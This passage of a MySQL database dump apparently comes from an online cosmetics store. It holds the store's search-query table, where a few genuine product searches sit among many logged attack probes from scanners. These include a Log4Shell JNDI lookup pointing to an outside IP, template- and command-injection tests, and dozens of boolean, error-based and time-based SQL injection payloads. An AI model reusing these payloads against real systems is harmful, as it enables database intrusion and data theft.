(18615, 1764),
(18616, 1765),
(18617, 1766),
(18618, 1767),
(18619, 1768),
(18620, 1769),
(18621, 1770),
(18622, 1771),
(18623, 1772),
(18624, 1773),
(18625, 1774),
(18626, 1775),
(18627, 1777),
(18628, 1778),
(18629, 1779),
(18630, 1780),
(18631, 1781),
(18632, 1782),
(18633, 1783),
(18634, 1784),
(18635, 1785),
(18636, 1786),
(18637, 1787),
(18638, 1788),
(18639, 1789),
(18640, 1790),
(18641, 1791),
(18642, 1792),
(18643, 1793),
(18644, 1794),
(18645, 1795),
(18646, 1796),
(18647, 1797),
(18648, 1798),
(18649, 1799),
(18650, 1800),
(18651, 1801),
(18652, 1802),
(18653, 1803),
(18654, 1804),
(18655, 1805),
(18656, 1806),
(18657, 1807),
(18658, 1808),
(18659, 1809),
(18660, 1810),
(18661, 1811),
(18662, 1812),
(18663, 1813),
(18664, 1814),
(18665, 1815),
(18666, 1816),
(18667, 1817),
(18668, 1818),
(18669, 1819),
(18670, 1820),
(18671, 1821),
(18672, 1822),
(18673, 1823),
(18674, 1824),
(18675, 1825),
(18676, 1826),
(18677, 1827),
(18678, 1828),
(18679, 1829),
(18680, 1830),
(18681, 1831),
(18682, 1832),
(18683, 1833),
(18684, 1834),
(18685, 1835),
(18686, 1836),
(18687, 1837),
(18688, 1838),
(18689, 1839),
(18690, 1840),
(18691, 1841),
(18692, 1842),
(18693, 1843),
(18694, 1844),
(18695, 1845),
(18696, 1846),
(18697, 1847),
(18698, 1848),
(18699, 1849),
(18700, 1850),
(18701, 1851),
(18702, 1852),
(18703, 1853),
(18704, 1854),
(18705, 1855),
(18706, 1856),
(18707, 1857),
(18708, 1858),
(18709, 1859),
(18710, 1860),
(18711, 1861),
(18712, 1862),
(18713, 1863),
(18714, 1864),
(18715, 1865),
(18716, 1866),
(18717, 1867),
(18718, 1868),
(18719, 1869),
(18720, 1870),
(18721, 1871),
(18722, 1872),
(18723, 1873),
(18724, 1874),
(18725, 1875),
(18726, 1876),
(18727, 1877),
(18728, 1878),
(18729, 1879),
(18730, 1880),
(18731, 1881),
(18732, 1882),
(18733, 1883),
(18734, 1884),
(18735, 1885),
(18736, 1886),
(18737, 1887),
(18738, 1888),
(18739, 1889),
(18740, 1890),
(18741, 1891),
(18742, 1892),
(18743, 1893),
(18744, 1894),
(18745, 1895),
(18746, 1896),
(18747, 1897),
(18748, 1898),
(18749, 1899),
(18750, 1900),
(18751, 1901),
(18752, 1902),
(18753, 1903),
(18754, 1904),
(18755, 1905),
(18756, 1906),
(18757, 1907),
(18758, 1908),
(18759, 1909),
(18760, 1910),
(18761, 1911),
(18762, 1912),
(18763, 1913),
(18764, 1914),
(18765, 1915),
(18766, 1916),
(18767, 1917),
(18768, 1918),
(18769, 1919),
(18770, 1920),
(18771, 1921),
(18772, 1922),
(18773, 1923),
(18774, 1924),
(18775, 1925),
(18776, 1926),
(18777, 1927),
(18778, 1928),
(18779, 1929),
(18780, 1930),
(18781, 1931),
(18782, 1932),
(18783, 1933),
(18784, 1934),
(18785, 1935),
(18786, 1936),
(18787, 1937),
(18788, 1938),
(18789, 1939),
(18790, 1940),
(18791, 1941),
(18792, 1942),
(18793, 1943),
(18794, 1944),
(18795, 1945),
(18796, 1946),
(18797, 1947),
(18798, 1948),
(18799, 1949),
(18800, 1950),
(18801, 1951),
(18802, 1952),
(18803, 1953),
(18804, 1954),
(18805, 1955),
(18806, 1956),
(18807, 1957),
(18808, 1958),
(18809, 1959),
(18810, 1960),
(18811, 1961),
(18812, 1962),
(18813, 1963),
(18814, 1964),
(18815, 1965),
(18816, 1966),
(18817, 1967),
(18818, 1968),
(18819, 1969),
(18820, 1970),
(18821, 1971),
(18822, 1972),
(18823, 1973),
(18824, 1974),
(18825, 1975),
(18826, 1976),
(18827, 1977),
(18828, 1978),
(18829, 1979),
(18830, 1980),
(18831, 1981),
(18832, 1982),
(18833, 1983),
(18834, 1984),
(18835, 1985),
(18836, 1986),
(18837, 1987),
(18838, 1988),
(18839, 1989),
(18840, 1990),
(18841, 1991),
(18842, 1992),
(18843, 1993),
(18844, 1994),
(18845, 1995),
(18846, 1996),
(18847, 1997),
(18848, 1998),
(18849, 1999),
(18850, 2000),
(18851, 2001),
(18852, 2002),
(18853, 2003),
(18854, 2004),
(18855, 2005),
(18856, 2006),
(18857, 2007),
(18858, 2008),
(18859, 2009),
(18860, 2010),
(18861, 2011),
(18862, 2012),
(18863, 2013),
(18864, 2014),
(18865, 2015),
(18866, 2016),
(18867, 2017),
(18868, 2018),
(18869, 2019),
(18870, 2020),
(18871, 2021),
(18872, 2022),
(18873, 2023),
(18874, 2024),
(18875, 2025),
(18876, 2026),
(18877, 2027),
(18878, 2028),
(18879, 2029),
(18880, 2030),
(18881, 2031),
(18882, 2032),
(18883, 2033),
(18884, 2034),
(18885, 2035),
(18886, 2036),
(18887, 2037),
(18888, 2038),
(18889, 2039),
(18890, 2040),
(18891, 2041),
(18892, 2042),
(18893, 2043),
(18894, 2044),
(18895, 2045),
(18896, 2046),
(18897, 2047),
(18898, 2048),
(18899, 2049),
(18900, 2050),
(18901, 2051),
(18902, 2064),
(18903, 2064),
(18904, 2064),
(18905, 2064),
(18906, 2064),
(18907, 2064),
(18908, 2064),
(18909, 2064),
(18910, 2064),
(18911, 2064),
(18912, 2064),
(18913, 2064),
(18914, 2064),
(18915, 2064);

-- --------------------------------------------------------

--
-- Table structure for table `search_query`
--

CREATE TABLE `search_query` (
  `query_id` int(10) UNSIGNED NOT NULL COMMENT 'Query ID',
  `query_text` varchar(255) DEFAULT NULL COMMENT 'Query text',
  `num_results` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Num results',
  `popularity` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Popularity',
  `redirect` varchar(255) DEFAULT NULL COMMENT 'Redirect',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `display_in_terms` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Display in terms',
  `is_active` smallint(6) DEFAULT 1 COMMENT 'Active status',
  `is_processed` smallint(6) DEFAULT 0 COMMENT 'Processed status',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated at'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Search query table';

--
-- Dumping data for table `search_query`
--

INSERT INTO `search_query` (`query_id`, `query_text`, `num_results`, `popularity`, `redirect`, `store_id`, `display_in_terms`, `is_active`, `is_processed`, `updated_at`) VALUES
(1, 'PERFUME121', 1, 17, NULL, 1, 1, 1, 0, '2020-08-08 10:31:12'),
(2, 'vv', 0, 0, NULL, 1, 1, 1, 0, '2020-08-22 04:57:56'),
(3, 'spot', 3, 1, NULL, 1, 1, 1, 0, '2020-08-27 06:04:15'),
(4, 'RAMY MESTA FACE', 6, 1, NULL, 1, 1, 1, 0, '2021-05-02 11:49:28'),
(6, 'Ramy Mesta Guard', 6, 1, NULL, 1, 1, 1, 0, '2021-12-19 07:03:22'),
(8, '${jndi:ldap://216.83.34.138:1389/www.bismoy.com}', 0, 1, NULL, 1, 1, 1, 0, '2022-01-10 00:19:20'),
(10, 'cream', 3, 4, NULL, 1, 1, 1, 0, '2022-03-02 13:51:13'),
(18, 'gift', 0, 82, NULL, 1, 1, 1, 0, '2022-06-17 05:52:58'),
(182, 'product', 5, 2, NULL, 1, 1, 1, 0, '2022-07-15 16:35:23'),
(186, '123456', 0, 170, NULL, 1, 1, 1, 0, '2023-10-19 04:20:04'),
(193, '${@var_dump(md5(128255377))};', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:01:59'),
(196, '/*1*/{{823106695+930305616}}', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:00'),
(203, '\'-var_dump(md5(882449643))-\'', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:03'),
(206, '${936331207+918315608}', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:04'),
(207, '${816123209+989300992}', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:04'),
(219, '${(885258875+912529936)?c}', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:07'),
(225, '123456/**/and+1=1', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:09'),
(227, '#set($c=905178722+978698085)${c}$c', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:09'),
(233, '123456/**/and+4=6', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:10'),
(235, '<%- 849526819+841200345 %>', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:11'),
(241, '123456\'and\'c\'=\'c', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:12'),
(245, '123456\nexpr 833018958 + 831727466', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:13'),
(249, '123456\'and\'b\'=\'q', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:13'),
(252, '123456|expr 815222239 + 940278538', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:14'),
(258, '123456\"and\"w\"=\"w', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:16'),
(259, '123456$(expr 897610597 + 971739890)', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:16'),
(265, '123456\"and\"r\"=\"u', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:17'),
(267, '123456&set /A 856596151+828814928', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:17'),
(276, 'expr 965867447 + 915510340', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:19'),
(288, '123456\'and/**/extractvalue(1,concat(char(126),md5(1152639192)))and\'', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:23'),
(289, '(select*from(select+sleep(0)union/**/select+1)a)', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:18'),
(292, '123456\"and/**/extractvalue(1,concat(char(126),md5(1019511655)))and\"', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:25'),
(294, '(select*from(select+sleep(5)union/**/select+1)a)', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:15:24'),
(296, 'extractvalue(1,concat(char(126),md5(1276407868)))', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:26'),
(298, '123456\'and(select*from(select+sleep(0))a/**/union/**/select+1)=\'', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:30'),
(299, '123456\'and(select\'1\'from/**/cast(md5(1411958735)as/**/int))>\'0', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:27'),
(302, '123456\'and(select*from(select+sleep(5))a/**/union/**/select+1)=\'', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:15:35'),
(303, '123456/**/and/**/cast(md5(\'1579006050\')as/**/int)>0', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:29'),
(306, '123456\"and(select*from(select+sleep(0))a/**/union/**/select+1)=\"', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:39'),
(308, 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1200930791\')))', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:30'),
(310, '123456\"and(select*from(select+sleep(5))a/**/union/**/select+1)=\"', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:15:44'),
(312, '123456\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1481502846\')))>\'0', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:32'),
(314, '123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:48'),
(315, '123456鎈\'\"\\(', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:06'),
(318, '123456/**/and(select+1/**/from/**/pg_sleep(5))>0/**/', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:15:52'),
(319, '123456\'\"\\(', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:10'),
(322, '123456\'/**/and(select\'1\'from/**/pg_sleep(0))::text>\'0', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:15:59'),
(324, '123456\'/**/and(select\'1\'from/**/pg_sleep(5))::text>\'0', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:16:04'),
(326, '123456/**/and(select+1)>0waitfor/**/delay\'0:0:0\'/**/', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:16:10'),
(328, '123456/**/and(select+1)>0waitfor/**/delay\'0:0:5\'/**/', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:16:17'),
(330, '123456\'and(select+1)>0waitfor/**/delay\'0:0:0', 0, 3, NULL, 1, 1, 1, 0, '2023-10-19 04:16:23'),
(332, '123456\'and(select+1)>0waitfor/**/delay\'0:0:5', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:16:30'),
(334, '123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE(\'w\',0)', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:46'),
(336, '123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE(\'p\',5)', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:48'),
(338, '123456\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'g\',0)=\'g', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:50'),
(340, '123456\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'b\',5)=\'b', 0, 1, NULL, 1, 1, 1, 0, '2022-12-05 21:02:51'),
(390, 'Search entire store here...', 0, 8, NULL, 1, 1, 1, 0, '2025-02-18 11:46:31'),
(396, '5157', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:17:31'),
(398, 'Search entire store here...\'\'(,\",..,.', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:17:40'),
(400, 'Search entire store here...\'ynGMbQ<\'\">CSSpJJ', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:17:44'),
(402, 'Search entire store here...) AND 5631=9116 AND (8278=8278', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:18:48'),
(404, 'Search entire store here...) AND 7999=7999 AND (9671=9671', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:19:03'),
(406, 'Search entire store here... AND 6079=6484', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:19:18'),
(408, 'Search entire store here... AND 7999=7999', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:19:32'),
(410, 'Search entire store here...\') AND 1441=3631 AND (\'WSbP\'=\'WSbP', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:19:46'),
(412, 'Search entire store here...\') AND 7999=7999 AND (\'jxtq\'=\'jxtq', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:20:00'),
(414, 'Search entire store here...\' AND 4130=8274 AND \'mmLO\'=\'mmLO', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:20:14'),
(416, 'Search entire store here...\' AND 7999=7999 AND \'srNJ\'=\'srNJ', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:20:28'),
(418, 'Search entire store here...%\' AND 6245=4781 AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:20:43'),
(420, 'Search entire store here...%\' AND 7999=7999 AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:20:57'),
(422, 'Search entire store here... AND 4209=7863-- yZHB', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:21:12'),
(424, 'Search entire store here... AND 7999=7999-- MfxP', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:21:27'),
(426, '(SELECT (CASE WHEN (5200=9860) THEN 5200 ELSE 5200*(SELECT 5200 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:21:40'),
(428, '(SELECT (CASE WHEN (4505=4505) THEN 4505 ELSE 4505*(SELECT 4505 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:21:58'),
(430, 'Search entire store here...) AND (SELECT 6823 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(6823=6823,1))),0x7171767a71,', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:22:13'),
(432, 'Search entire store here... AND (SELECT 6823 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(6823=6823,1))),0x7171767a71,F', 8, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:22:22'),
(434, 'Search entire store here...\') AND (SELECT 6823 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(6823=6823,1))),0x7171767a71', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:22:32'),
(436, 'Search entire store here...\' AND (SELECT 6823 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(6823=6823,1))),0x7171767a71,', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:22:41'),
(438, 'Search entire store here...%\' AND (SELECT 6823 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(6823=6823,1))),0x7171767a71', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:22:49'),
(441, 'Search entire store here...) AND 2722=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2722=2722) TH', 6, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:23:05'),
(443, 'Search entire store here... AND 2722=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2722=2722) THE', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:23:13'),
(445, 'Search entire store here...\') AND 2722=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2722=2722) T', 10, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:23:21'),
(447, 'Search entire store here...\' AND 2722=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2722=2722) TH', 6, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:23:33'),
(449, 'Search entire store here...%\' AND 2722=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2722=2722) T', 10, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:23:44'),
(452, 'Search entire store here...) AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:24:03'),
(454, 'Search entire store here... AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:24:13'),
(456, 'Search entire store here...\') AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN ', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:24:22'),
(458, 'Search entire store here...\' AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:24:32'),
(460, 'Search entire store here...%\' AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN ', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:24:40'),
(463, 'Search entire store here...) AND 9287=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113)||', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:24:59'),
(465, 'Search entire store here... AND 9287=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113)||(', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:25:07'),
(467, 'Search entire store here...\') AND 9287=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113)|', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:25:16'),
(469, 'Search entire store here...\' AND 9287=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113)||', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:25:26'),
(471, 'Search entire store here...%\' AND 9287=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113)|', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:25:34'),
(474, '(SELECT 8269 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(8269=8269,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATI', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:25:51'),
(476, '(SELECT CONCAT(0x7178707071,(SELECT (ELT(1083=1083,1))),0x7171767a71))', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:26:00'),
(478, '(SELECT (CHR(113)||CHR(120)||CHR(112)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1226=1226) THEN 1 ELSE 0 END))::text||(CHR(113)|', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:26:08'),
(480, '(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3290=3290) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:26:17'),
(482, 'Search entire store here...);SELECT SLEEP(5)#', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:40'),
(484, 'Search entire store here...;SELECT SLEEP(5)#', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:41'),
(486, 'Search entire store here...\');SELECT SLEEP(5)#', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:43'),
(488, 'Search entire store here...\';SELECT SLEEP(5)#', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:45'),
(490, 'Search entire store here...%\';SELECT SLEEP(5)#', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:46'),
(492, 'Search entire store here...);SELECT PG_SLEEP(5)--', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:48'),
(494, 'Search entire store here...;SELECT PG_SLEEP(5)--', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:50'),
(496, 'Search entire store here...\');SELECT PG_SLEEP(5)--', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:52'),
(498, 'Search entire store here...\';SELECT PG_SLEEP(5)--', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:54'),
(500, 'Search entire store here...%\';SELECT PG_SLEEP(5)--', 2, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:55'),
(502, 'Search entire store here...);WAITFOR DELAY \'0:0:5\'--', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:57'),
(504, 'Search entire store here...;WAITFOR DELAY \'0:0:5\'--', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:37:59'),
(506, 'Search entire store here...\');WAITFOR DELAY \'0:0:5\'--', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:01'),
(508, 'Search entire store here...\';WAITFOR DELAY \'0:0:5\'--', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:02'),
(510, 'Search entire store here...%\';WAITFOR DELAY \'0:0:5\'--', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:04'),
(512, 'Search entire store here...);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(79)||CHR(82)||CHR(120),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:14'),
(514, 'Search entire store here...;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(79)||CHR(82)||CHR(120),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:18'),
(516, 'Search entire store here...\');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(79)||CHR(82)||CHR(120),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:21'),
(518, 'Search entire store here...\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(79)||CHR(82)||CHR(120),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:24'),
(520, 'Search entire store here...%\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(79)||CHR(82)||CHR(120),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:28'),
(522, 'Search entire store here...) AND SLEEP(5) AND (8215=8215', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:31'),
(524, 'Search entire store here... AND SLEEP(5)', 4, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:15'),
(526, 'Search entire store here...\') AND SLEEP(5) AND (\'xOSk\'=\'xOSk', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:39'),
(528, 'Search entire store here...\' AND SLEEP(5) AND \'kDjS\'=\'kDjS', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:42'),
(530, 'Search entire store here...%\' AND SLEEP(5) AND \'%\'=\'', 4, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:18'),
(532, 'Search entire store here... AND SLEEP(5)-- cWih', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:50'),
(534, 'Search entire store here...) AND 1529=(SELECT 1529 FROM PG_SLEEP(5)) AND (9247=9247', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:54'),
(536, 'Search entire store here... AND 1529=(SELECT 1529 FROM PG_SLEEP(5))', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:27:57'),
(538, 'Search entire store here...\') AND 1529=(SELECT 1529 FROM PG_SLEEP(5)) AND (\'XNVd\'=\'XNVd', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:01'),
(540, 'Search entire store here...\' AND 1529=(SELECT 1529 FROM PG_SLEEP(5)) AND \'uQEC\'=\'uQEC', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:05'),
(542, 'Search entire store here...%\' AND 1529=(SELECT 1529 FROM PG_SLEEP(5)) AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:09'),
(544, 'Search entire store here... AND 1529=(SELECT 1529 FROM PG_SLEEP(5))-- ObJR', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:12'),
(546, 'Search entire store here...) WAITFOR DELAY \'0:0:5\' AND (7936=7936', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:16'),
(548, 'Search entire store here... WAITFOR DELAY \'0:0:5\'', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:28'),
(550, 'Search entire store here...\') WAITFOR DELAY \'0:0:5\' AND (\'VBCd\'=\'VBCd', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:22'),
(552, 'Search entire store here...\' WAITFOR DELAY \'0:0:5\' AND \'BRwD\'=\'BRwD', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:26'),
(554, 'Search entire store here...%\' WAITFOR DELAY \'0:0:5\' AND \'%\'=\'', 4, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:38:30'),
(556, 'Search entire store here... WAITFOR DELAY \'0:0:5\'-- ITuX', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:33'),
(558, 'Search entire store here...) AND 4429=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(120)||CHR(104)||CHR(75),5) AND (4721=4721', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:35'),
(560, 'Search entire store here... AND 4429=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(120)||CHR(104)||CHR(75),5)', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:40'),
(562, 'Search entire store here...\') AND 4429=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(120)||CHR(104)||CHR(75),5) AND (\'StBj\'=\'StBj', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:43'),
(564, 'Search entire store here...\' AND 4429=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(120)||CHR(104)||CHR(75),5) AND \'VcHn\'=\'VcHn', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:46'),
(566, 'Search entire store here...%\' AND 4429=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(120)||CHR(104)||CHR(75),5) AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:50'),
